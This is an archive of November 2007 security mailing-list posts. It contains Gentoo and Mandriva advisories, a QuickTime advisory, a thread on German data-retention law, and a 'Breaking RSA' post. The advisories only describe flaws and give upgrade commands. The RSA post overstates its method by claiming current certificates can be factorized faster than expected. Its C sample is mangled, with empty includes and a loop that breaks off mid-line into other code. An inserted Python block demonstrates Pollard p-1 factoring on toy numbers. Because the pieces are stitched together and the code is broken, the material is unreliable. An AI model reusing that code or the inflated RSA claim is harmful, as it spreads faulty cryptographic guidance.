[ GLSA 200711-20 ] Pioneers: Denial of Service
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200711-20
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Pioneers: Denial of Service
      Date: November 14, 2007
      Bugs: #198807
        ID: 200711-20

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability has been discovered in Pioneers, possibly resulting in a
Denial of Service.

Background
==========

Pioneers (formerly gnocatan) is a clone of the popular board game "The
Settlers of Catan".

Affected packages
=================

    -------------------------------------------------------------------
     Package                /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  games-board/pioneers        < 0.11.3                    >= 0.11.3

Description
===========

Bas Wijnen discovered that the Pioneers server may free session objects
while they are still in use, resulting in access to invalid memory
zones.

Impact
======

A remote attacker could send specially crafted data to the vulnerable
server, resulting in a Denial of Service.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Pioneers users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=games-board/pioneers-0.11.3"

References
==========

  [ 1 ] CVE-2007-5933
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5933

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-20.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHO3KAuhJ+ozIKI5gRAuqNAJ4qsKRL2X+QAwHrfYVd2a+XG8iuzQCgnWNu
usSD3uazJ2TJkCor/qlCu3k=
=7Cf4
-----END PGP SIGNATURE-----
Re: Standing Up Against German Laws - Project HayNeedle
Hello.

On Tue, Nov 13, 2007 at 04:38:39PM -0500, [EMAIL PROTECTED] wrote:
> On Tue, 13 Nov 2007 13:07:02 PST, johan beisser said:
> > The logs don't contain context, just who/where/when. While
> > encryption will prevent (one hopes) the capability of recovering
> > context, who you talked to is not kept private or otherwise secret.
>
> It's probably a good idea to deploy encryption *now*, and use it for
> *everything*, and be ready for when (not if) they decide to be more
> draconian in their logging requirements.

AFAIR the German situation is as follows:

Any German email provider having more than 1000 customers has to provide a method for giving government access to the mailbox, including the ability to read the content. Access should be controlled by judges. If there are more than 1 customers it has to be done with hardware, so called SINA boxes. Even if there is not a precise definition of customer (person, company, contract) it is quite clear that the law has got an impact on users of t-online, web.de, GMX, Freenet and others. This law started Jan 1st, 2005.

The data retention law is a possibility to analyze social networks even if email is encrypted. There are other purposes, too.

regards
Frank
Breaking RSA: Totient indirect factorization
Breaking RSA: Totient indirect factorization

Author: Alex Bassas Serramia (I'm very sorry for my poor English but it's not my first language).

Introduction

This document tries to expose an algorithm that allows the factorization of the RSA modulus' totient and then breaking RSA.

RSA algorithm

The RSA algorithm is generated the following way:

1) m = p*q -> RSA modulus
2) t = (p-1)*(q-1) -> totient(m)
3) (e*d) mod t = 1 mod t
4) a^e mod m = b
5) b^d mod m = a

e = public key
d = private key

RSA strength

Equation (3) shows that it is possible to recover the private key "d" knowing the public key "e" and the totient "t".

"a^n mod m" sequence

To learn about the totient we have to examine the sequence "a^n mod m". One sample is "2^n mod 11" (n from 1 to 11), with totient 10:

2, 4, 8, 5, 10, 9, 7, 3, 6, *1, 2

At "n=10" we have one "1" because "a^totient(m) mod m" is always one (Euler's theorem). The sequence "3^n mod 11" has the same totient 10:

3, 9, 5, 4, *1, 3, 9, 5, 4, *1, 3

but we have two "1", at "n=5" and "n=10" (the totient). In this case we can observe the cyclic nature of "a^n mod m", because we always have the same list of numbers before each "1".

"a^n mod m = 1" equation

The cyclic nature of the "a^n mod m" sequence takes us to the first statement:

1) The exponent values of the "a^n mod m = 1" solutions are always divisors of the totient.

The sequence "3^n mod 11" has "5" and "10" as solutions; they are divisors of the totient (totient(11) = 10).

3, 9, 5, 4, *1, 3, 9, 5, 4, *1, 3

Maximizing "a^n mod m = 1" solutions

The second statement is:

2) If "x" is a divisor of the totient then "a^x^n mod m = 1" will multiply the "a^n mod m = 1" solutions by "x".

Ex.: The "2^n mod 11" sequence has one "1":

2, 4, 8, 5, 10, 9, 7, 3, 6, *1, 2

"2^5^n = 32^n"; "32^n mod 11" produces 5 ones:

10, *1, 10, *1, 10, *1, 10, *1, 10, *1, 10

"a^n mod m = 1" limit

The third statement is:

3) If x is not yet a divisor of the totient then "a^x^n mod m = 1" will have the same solutions as "a^n mod m = 1" but with the values permuted.

Ex.: The "2^n mod 11" sequence has one "1":

2, 4, 8, 5, 10, 9, 7, 3, 6, *1, 2

"2^2^n = 4^n"; "4^n mod 11" has two "1":

4, 5, 9, 3, *1, 4, 5, 9, 3, *1, 4

"4^2^n = 16^n"; "16^n mod 11" still has two "1" but with the values permuted:

5, 3, 4, 9, *1, 5, 3, 4, 9, *1, 5

Ending the sequence

The last statement is:

4) If "a" contains by power all the divisors of the totient then "a^n mod m" will always be "1".

Ex.: "2^2^5^n = 1024^n mod 11":

*1, *1, *1, *1, *1, *1, *1, *1, *1, *1, *1

Euler's extension

This statement is a consequence of statement number 3, but I don't use it in the algorithm.

5) If "n" is greater than the biggest of the coincident divisors of the totient then:

a^((n-1)(t*(t+1)/2)) mod m = 1 mod m    (t = totient(m))

Algorithm

- Repeat "a = a^n mod m" with n from 2 to m, saving all the results in a table until a == 1 (Statement 4).
- Examine the table from end to beginning, printing "n" if the number of "ones" is divisible by "n" (Statements 1, 2, 3).

Impact

PKI vendors must change modulus generator algorithms to discard totients with lower factors. Current certificates can be factorized in lower time than expected and compromised; vendors must review each one separately.

Credits

Alex Bassas Serramia, Barcelona (SPAIN)

Sample

/* (c) Alex Bassas Serramia, Barcelona, SPAIN. */

#ifdef WIN32
#include
#include
#else
typedef long long ULONG64;
#define TRUE (-1)
#define FALSE (0)
#endif
#include <stdio.h>    /* printf */
#include <stdlib.h>   /* rand */

/* Build a 64-bit value from eight successive bytes of rand(). */
ULONG64 getrand (void)
{
    ULONG64 n, num = 0;
    for (n = 0; n < 8; n++) {
        num = (num << 8) | (rand() % 256);
    }
    return (num);
}

/* Right-to-left binary exponentiation: x^n mod m. */
ULONG64 expmod (ULONG64 x, ULONG64 n, ULONG64 m)
{
    ULONG64 r = 1;
    while (n) {
        if (n & 1) {
            r = (r * x) % m;
            n = n - 1;
        }
        x = (x * x) % m;
        n = n / 2;
    }
    return (r);
}

/* Fermat test with eight random bases. */
int isprime (ULONG64 p)
{
    ULONG64 k, a;
    for (k = 0; k < 8; k++) {
        a = getrand() % p;
        if (expmod(a, p - 1, p) != 1) {
            return (FALSE);
        }
    }
    return (TRUE);
}

/* 2^bits */
ULONG64 value (ULONG64 bits)
{
    ULONG64 n;
    n = (ULONG64)1 << bits;
    return (n);
}

ULONG64 getprime (ULONG64 bits, ULONG64 mbits)
{
    ULONG64 num, m;
    m = value(mbits);
    do {
        num = getrand();
        if (bits < 64) {
            num %= value(bits);
        }
    } while ((num=0;n--) {
        read_reg (f,n,&a);
        read_reg (f,n+1,&b);
        r = expmod (a.base,e,m);
        if (r != 1) {
            printf ("reverse\texp = %I64i\r\n",a.ex
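The two steps in the Algorithm section, taken together, are a known technique: repeating a = a^n mod m for n = 2, 3, ..., k leaves a = a^(k!) mod m, and the condition named in the Impact paragraph (a totient with only small factors) is exactly the condition under which Pollard's p-1 method splits m. The block below is an added example and not the post's code: it runs that iteration in Python with a gcd after every step against two constructed moduli, one whose p-1 is 13-smooth and one built from safe primes, and ends with the smoothness check a key generator or auditor would apply. pollard_pm1, largest_prime_factor, key_is_pm1_weak and the two moduli are assumed names and constructed values, not anything the post defines.

```python
"""Added example, not the post's code: the post's loop a <- a^n mod m for
n = 2..k computes a^(k!) mod m.  Taking gcd(a^(k!) - 1, m) after each step is
Pollard's p-1 method, which splits m = p*q as soon as p-1 divides k!, i.e.
when p-1 is smooth.  All numbers below are constructed for the demonstration."""
from math import gcd


def pollard_pm1(m, bound, base=2):
    """Return a nontrivial factor of m, or None if none appears by `bound`.

    After the k-th loop iteration `a` equals base^(k!) mod m.
    """
    a = base % m
    g = gcd(a, m)
    if 1 < g < m:              # the base itself shares a factor with m
        return g
    for k in range(2, bound + 1):
        a = pow(a, k, m)       # a = base^(k!) mod m
        g = gcd(a - 1, m)
        if g == m:
            # every prime factor of m hit 1 at the same step: the method
            # fails for this base (a different base or a finer stage is needed)
            return None
        if g > 1:
            return g
    return None


def largest_prime_factor(n):
    """Trial-division helper: the largest prime dividing n (n >= 2)."""
    largest = 1
    d = 2
    while d * d <= n:
        while n % d == 0:
            largest = d
            n //= d
        d += 1
    return max(largest, n) if n > 1 else largest


def key_is_pm1_weak(p, q, bound):
    """The check a modulus generator (or an auditor) would apply before
    accepting p and q: is p-1 or q-1 `bound`-smooth?  Assumed helper."""
    return (largest_prime_factor(p - 1) <= bound
            or largest_prime_factor(q - 1) <= bound)


# Constructed moduli.  1951 is prime with 1951 - 1 = 2 * 3 * 5^2 * 13, so a
# bound of 13 already makes 13! a multiple of p-1.  2039 = 2*1019 + 1 and
# 2207 = 2*1103 + 1 are safe primes: p-1 has a prime factor above any small
# bound, so the iteration never reaches 1 modulo either prime.
SMOOTH_MODULUS = 1951 * 2039   # 3978089, p-1 smooth  -> factor found
SAFE_MODULUS = 2039 * 2207     # 4500073, safe primes -> method stalls


if __name__ == "__main__":
    print("smooth modulus:", pollard_pm1(SMOOTH_MODULUS, bound=13))
    print("safe-prime modulus:", pollard_pm1(SAFE_MODULUS, bound=1000))
    print("weak key (1951, 2039):", key_is_pm1_weak(1951, 2039, 1000))
    print("weak key (2039, 2207):", key_is_pm1_weak(2039, 2207, 1000))
```

The bound is what makes the caveat concrete: the method costs about `bound` modular exponentiations, and it only ever finds a prime p whose p-1 is `bound`-smooth. A modulus built from primes whose p-1 and q-1 each carry a large prime factor, as the safe-prime modulus above, is untouched however long the table in the post's algorithm is allowed to grow.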
[ GLSA 200711-19 ] TikiWiki: Multiple vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200711-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: TikiWiki: Multiple vulnerabilities
      Date: November 14, 2007
      Bugs: #195503
        ID: 200711-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been discovered in TikiWiki, possibly
resulting in the remote execution of arbitrary code.

Background
==========

TikiWiki is an open source content management system written in PHP.

Affected packages
=================

    -------------------------------------------------------------------
     Package                /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  www-apps/tikiwiki           < 1.9.8.3                   >= 1.9.8.3

Description
===========

Stefan Esser reported that a previous vulnerability (CVE-2007-5423,
GLSA 200710-21) was not properly fixed in TikiWiki 1.9.8.1
(CVE-2007-5682). The TikiWiki development team also added several
checks to avoid file inclusion.

Impact
======

A remote attacker could exploit these vulnerabilities to inject
arbitrary code with the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All TikiWiki users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-apps/tikiwiki-1.9.8.3"

References
==========

  [ 1 ] GLSA 200710-21
        http://www.gentoo.org/security/en/glsa/glsa-200710-21.xml
  [ 2 ] CVE-2007-5423
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5423
  [ 3 ] CVE-2007-5682
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5682

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-19.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHO2/0uhJ+ozIKI5gRApqxAJ9f523yR0Xs6IX7mlfsvwb9rL6lKwCeI74G
QUpCYYjgvTMZ+iTcc6Xopr4=
=xATD
-----END PGP SIGNATURE-----
[ GLSA 200711-18 ] Cpio: Buffer overflow
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200711-18
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Cpio: Buffer overflow
      Date: November 14, 2007
      Bugs: #196978
        ID: 200711-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

GNU cpio contains a buffer overflow vulnerability, possibly resulting
in a Denial of Service.

Background
==========

GNU cpio copies files into or out of a cpio or tar archive.

Affected packages
=================

    -------------------------------------------------------------------
     Package                /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  app-arch/cpio               < 2.9-r1                    >= 2.9-r1

Description
===========

A buffer overflow vulnerability in the safer_name_suffix() function in
GNU cpio has been discovered.

Impact
======

A remote attacker could entice a user to open a specially crafted
archive file, resulting in a stack-based buffer overflow, possibly
crashing the application. It is disputed whether the execution of
arbitrary code is possible.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All GNU cpio users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-arch/cpio-2.9-r1"

References
==========

  [ 1 ] CVE-2007-4476
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4476

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-18.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHO2u2uhJ+ozIKI5gRAmnOAJwMQ1PcCPV7njoFZjURGIq8yaMcNwCglXrY
rzGwkgPMnvNOL4Kevl6kEns=
=m21S
-----END PGP SIGNATURE-----
TPTI-07-20: Apple Quicktime Movie Stack Overflow Vulnerability
TPTI-07-20: Apple Quicktime Movie Stack Overflow Vulnerability
http://dvlabs.tippingpoint.com/advisory/TPTI-07-20
November 12, 2007

-- CVE ID:
CVE-2007-4674

-- Affected Vendor:
Apple

-- Affected Products:
QuickTime 7.2

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Apple Quicktime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the parsing of a malformed movie atom. Specifying a large size will result in a stack overflow. If exploited, remote code execution can be achieved with the credentials of the logged in user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can be found at:

http://docs.info.apple.com/article.html?artnum=306896

-- Disclosure Timeline:
2007.10.19 - Vulnerability reported to vendor
2007.11.12 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Cody Pierce - TippingPoint DVLabs.
Re: Standing Up Against German Laws - Project HayNeedle
Hi Raju,

On Nov 14, 2007 3:20 AM, Raj Mathur <[EMAIL PROTECTED]> wrote:
> The mail addresses can only be stored if the server through which the
> mail is relayed (or on which it originates) falls under the law. I'd
> presume that's not a significant percentage of all mails sent out from
> any country.

(a) (as you say) they can of course be trivially extracted from the traffic flow at the provider level. cf the current EFF / NSA / San Francisco case - that (as I understand it) is probably in breach of the US Constitution, yet it happened/is happening. The German law, and similar laws in the UK and other countries, implicitly (at least) enables such tactics;

(b) most mail users use mail servers at their employers or their local ISP (ISPs with retail presence in multiple territories will of course have mail servers situated locally);

(c) the balance, excluding those weirdos running their own personal MTA / MSAs, will be using webmail services like Hotmail and Gmail. Tracerouting from the machine I'm typing this on (in the UK) shows a route through my ISP, to LINX (the London IX), and then straight into Google space. The RTT all the way to the final hop is in the 30ms range:

[...]
 8  209.85.248.80 (209.85.248.80)  25.302 ms  24.348 ms  25.605 ms
     MPLS Label 548800 TTL=1
 9  209.85.248.79 (209.85.248.79)  27.972 ms  36.281 ms  26.562 ms
10  72.14.233.77 (72.14.233.77)  28.266 ms  29.057 ms  27.273 ms
11  66.249.94.146 (66.249.94.146)  29.517 ms  30.668 ms  30.179 ms
12  ik-in-f19.google.com (66.249.91.19)  28.092 ms  27.926 ms  28.564 ms

...which strongly suggests to me that the front-end Gmail webserver my "mail" hits is probably pretty close to me. It's certainly not on the other side of the Atlantic. There's quite a lot of cooperation between EU member states, would a "UKUSA"-type arrangement in the EU be very surprising?
=i On Nov 14, 2007 3:20 AM, Raj Mathur <[EMAIL PROTECTED]> wrote: > On Tuesday 13 November 2007 15:29, Florian Echtler wrote: > > [snip] > > As a native German speaker, allow me to clarify: with respect to IP > > communication, the law mandates saving the following information for > > 6 months: > > > > - which customer was assigned which IP for what timespan > > - sender mail address, receiver mail address and sender IP for each > > mail - in case of VOIP: caller and callee phone number and IP address > > The mail addresses can only be stored if the server through which the > mail is relayed (or on which it originates) falls under the law. I'd > presume that's not a significant percentage of all mails sent out from > any country. > > Of course, it's also possible to track (snoop) all SMTP traffic on the > network, but that's totally different from just keeping mail and AAA > server logs and from my understanding that's not what this law > mandates. > > Regards, > > -- Raju > -- > Raj Mathur[EMAIL PROTECTED] http://kandalaya.org/ > Freedom in Technology & Software || February 2008 || http://freed.in/ >GPG: 78D4 FC67 367F 40E2 0DD5 0FEF C968 D0EF CC68 D17F > PsyTrance & Chill: http://schizoid.in/ || It is the mind that moves > -- And what exactly is a dream? And what exactly is a joke? - Syd Barrett
[ GLSA 200711-17 ] Ruby on Rails: Multiple vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200711-17
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Ruby on Rails: Multiple vulnerabilities
      Date: November 14, 2007
      Bugs: #195315, #182223
        ID: 200711-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Several vulnerabilities were found in Ruby on Rails allowing for file
disclosure and theft of user credentials.

Background
==========

Ruby on Rails is a free web framework used to develop database-driven
web applications.

Affected packages
=================

    -------------------------------------------------------------------
     Package                /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  dev-ruby/rails              < 1.2.5                     >= 1.2.5

Description
===========

candlerb found that ActiveResource, when processing responses using the
Hash.from_xml() function, does not properly sanitize filenames
(CVE-2007-5379). The session management functionality allowed the
"session_id" to be set in the URL (CVE-2007-5380). BCC discovered that
the to_json() function does not properly sanitize input before
returning it to the user (CVE-2007-3227).

Impact
======

Unauthenticated remote attackers could exploit these vulnerabilities to
determine the existence of files or to read the contents of arbitrary
XML files; conduct session fixation attacks and gain unauthorized
access; and execute arbitrary HTML and script code in a user's browser
session in the context of an affected site by enticing a user to browse
a specially crafted URL.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Ruby on Rails users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-ruby/rails-1.2.5"

References
==========

  [ 1 ] CVE-2007-3227
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3227
  [ 2 ] CVE-2007-5379
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5379
  [ 3 ] CVE-2007-5380
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5380

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-17.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHO2VEuhJ+ozIKI5gRAhtQAJ4/nC4Lhyg3HnpGUcyPSr7JIq5BrACfR6vF
jsBmdVGMQCK1OV5oGd1Pnlc=
=aSWR
-----END PGP SIGNATURE-----
Re: Standing Up Against German Laws - Project HayNeedle
On Tuesday 13 November 2007 15:29, Florian Echtler wrote: > [snip] > As a native German speaker, allow me to clarify: with respect to IP > communication, the law mandates saving the following information for > 6 months: > > - which customer was assigned which IP for what timespan > - sender mail address, receiver mail address and sender IP for each > mail - in case of VOIP: caller and callee phone number and IP address The mail addresses can only be stored if the server through which the mail is relayed (or on which it originates) falls under the law. I'd presume that's not a significant percentage of all mails sent out from any country. Of course, it's also possible to track (snoop) all SMTP traffic on the network, but that's totally different from just keeping mail and AAA server logs and from my understanding that's not what this law mandates. Regards, -- Raju -- Raj Mathur[EMAIL PROTECTED] http://kandalaya.org/ Freedom in Technology & Software || February 2008 || http://freed.in/ GPG: 78D4 FC67 367F 40E2 0DD5 0FEF C968 D0EF CC68 D17F PsyTrance & Chill: http://schizoid.in/ || It is the mind that moves
[ MDKSA-2007:218 ] - Updated mono packages fix arbitrary code execution vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:218 http://www.mandriva.com/security/ ___ Package : mono Date: November 14, 2007 Affected: 2007.0, 2007.1, 2008.0 ___ Problem Description: IOActive Inc. found a buffer overflow in Mono.Math.BigInteger class in Mono 1.2.5.1 and previous versions, which allows arbitrary code execution by context-dependent attackers. Updated packages fix this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5197 ___ Updated Packages: Mandriva Linux 2007.0: b9d567706da7df90b47ba3a7d19860bc 2007.0/i586/jay-1.1.17.1-5.3mdv2007.0.i586.rpm 8761f440233b19cd1cd0a89f570645ab 2007.0/i586/libmono-runtime-1.1.17.1-5.3mdv2007.0.i586.rpm ec8c893fb7dce3ac0a84a25354ae5b71 2007.0/i586/libmono0-1.1.17.1-5.3mdv2007.0.i586.rpm be7674691a7e993be13a4881cdf8e1c4 2007.0/i586/libmono0-devel-1.1.17.1-5.3mdv2007.0.i586.rpm dd69d1b1d77a970bbd69deeca3cba072 2007.0/i586/mono-1.1.17.1-5.3mdv2007.0.i586.rpm 4be1187e19e3cbfc571418dc05c29194 2007.0/i586/mono-data-sqlite-1.1.17.1-5.3mdv2007.0.i586.rpm 19f7a6a36839e454b744f082792a95e5 2007.0/i586/mono-doc-1.1.17.1-5.3mdv2007.0.i586.rpm 05069e51e4b6e18973bd3727af71eda4 2007.0/SRPMS/mono-1.1.17.1-5.3mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 6821742c220f15a204f6c11e1097da73 2007.0/x86_64/jay-1.1.17.1-5.3mdv2007.0.x86_64.rpm 434778d7a971fdccea1e0f2186e964f9 2007.0/x86_64/lib64mono0-1.1.17.1-5.3mdv2007.0.x86_64.rpm 656169f3f2901ff4fa9de7b895a97333 2007.0/x86_64/lib64mono0-devel-1.1.17.1-5.3mdv2007.0.x86_64.rpm 1f4e0426187652ba278fe7ff2d6b097b 2007.0/x86_64/libmono-runtime-1.1.17.1-5.3mdv2007.0.x86_64.rpm 51f510ba19d6c613a5a0569291c449f8 2007.0/x86_64/mono-1.1.17.1-5.3mdv2007.0.x86_64.rpm 4b3a0a3bf7eee78062dcd71bd2ba5889 2007.0/x86_64/mono-data-sqlite-1.1.17.1-5.3mdv2007.0.x86_64.rpm 3591ed164f177be930c137395e7aa59f 2007.0/x86_64/mono-doc-1.1.17.1-5.3mdv2007.0.x86_64.rpm 05069e51e4b6e18973bd3727af71eda4 2007.0/SRPMS/mono-1.1.17.1-5.3mdv2007.0.src.rpm 
Mandriva Linux 2007.1: cd8398d38826f2c2b1f4c1ebdbc05d4e 2007.1/i586/jay-1.2.3.1-4.1mdv2007.1.i586.rpm d2fde2f68ec91f4ac815de617c36a54d 2007.1/i586/libmono0-1.2.3.1-4.1mdv2007.1.i586.rpm f084c0e39b28522e50e1929726c00e87 2007.1/i586/libmono0-devel-1.2.3.1-4.1mdv2007.1.i586.rpm cc4e1ec31cdedda7ffea4dfa907e75b0 2007.1/i586/mono-1.2.3.1-4.1mdv2007.1.i586.rpm d2bbc574fd1d9ec309d760da6ed310f6 2007.1/i586/mono-bytefx-data-mysql-1.2.3.1-4.1mdv2007.1.i586.rpm a3e21245b230ab317925ab948125ffd6 2007.1/i586/mono-data-1.2.3.1-4.1mdv2007.1.i586.rpm fe40d27e56faac9c2d9167ebed3aaf48 2007.1/i586/mono-data-firebird-1.2.3.1-4.1mdv2007.1.i586.rpm 8b023626db80ca7d2b452ce1f9582462 2007.1/i586/mono-data-oracle-1.2.3.1-4.1mdv2007.1.i586.rpm a91ed3d8d46c3da92fa0484a4584d21c 2007.1/i586/mono-data-postgresql-1.2.3.1-4.1mdv2007.1.i586.rpm bba894fa17420fc37ff97946d28fb7a9 2007.1/i586/mono-data-sqlite-1.2.3.1-4.1mdv2007.1.i586.rpm d4556931bee6df1b31216ecbd1c9c09d 2007.1/i586/mono-data-sybase-1.2.3.1-4.1mdv2007.1.i586.rpm 7fd252b712567dd27d73bd6cd12d 2007.1/i586/mono-doc-1.2.3.1-4.1mdv2007.1.i586.rpm 1f681e0ef96b53c40526fae5aaa9e78c 2007.1/i586/mono-extras-1.2.3.1-4.1mdv2007.1.i586.rpm de3caa8e2c13781dc9cf40c50a78b73c 2007.1/i586/mono-ibm-data-db2-1.2.3.1-4.1mdv2007.1.i586.rpm f406edad2c786cb651f2637d8a7a206b 2007.1/i586/mono-jscript-1.2.3.1-4.1mdv2007.1.i586.rpm 34820957e0678deeb59537c194ae8cee 2007.1/i586/mono-locale-extras-1.2.3.1-4.1mdv2007.1.i586.rpm 6a2a33508c23763e0d66714017d13cb0 2007.1/i586/mono-nunit-1.2.3.1-4.1mdv2007.1.i586.rpm cd73df7c62fe129a21c7ce6c46a21fa5 2007.1/i586/mono-web-1.2.3.1-4.1mdv2007.1.i586.rpm 791cc17afcc4cc1446e4bf5f0483ba69 2007.1/i586/mono-winforms-1.2.3.1-4.1mdv2007.1.i586.rpm 5a2decbedede539c73c34cd2abe53c9c 2007.1/SRPMS/mono-1.2.3.1-4.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 4a4cd3e01867703e87629c1803bc1fd2 2007.1/x86_64/jay-1.2.3.1-4.1mdv2007.1.x86_64.rpm 04a0cd2fa60cfed84164758a04fe381a 2007.1/x86_64/lib64mono0-1.2.3.1-4.1mdv2007.1.x86_64.rpm 
5abe1519303796c34ed013705b3e8eff 2007.1/x86_64/lib64mono0-devel-1.2.3.1-4.1mdv2007.1.x86_64.rpm c91bab9f4fb6f53425b1d8f05f5adaf6 2007.1/x86_64/mono-1.2.3.1-4.1mdv2007.1.x86_64.rpm 9473cb69096d859f36c42778ff48f71d 2007.1/x86_64/mono-bytefx-data-mysql-1.2.3.1-4.1mdv2007.1.x86_64.rpm e1d135f40c1373897186701da080c8e1 2007.1/x86_64/mono-data-1.2.3.1-4.1mdv2007.1.x86_64.rpm 740160f5eadbb54ed7b3c1215370ea88 2007.1/x86_64/mono-data-firebird-1.2.3.1-4.1mdv2007.1.x86
[security bulletin] HPSBMA02288 SSRT071465 rev.1 - HP OpenView Operations (OVO) Running on HP-UX and Solaris, Remote Unauthorized Access, Denial of Service (DoS)
